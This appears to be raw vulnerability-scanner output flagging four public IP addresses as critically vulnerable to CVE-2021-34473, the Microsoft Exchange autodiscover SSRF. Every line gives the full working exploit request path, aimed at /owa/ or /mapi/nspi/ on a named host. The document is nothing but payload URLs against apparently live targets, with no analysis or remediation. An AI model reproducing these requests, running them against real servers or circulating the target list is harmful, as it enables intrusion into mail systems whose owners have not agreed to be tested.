[CVE-2021-34473] [http] [critical] https://201.168.156.56:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.168.156.56:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.184.168.66:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.184.168.66:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://216.230.137.140:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://216.230.137.140:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] http://216.238.99.75:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] http://216.238.99.75:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com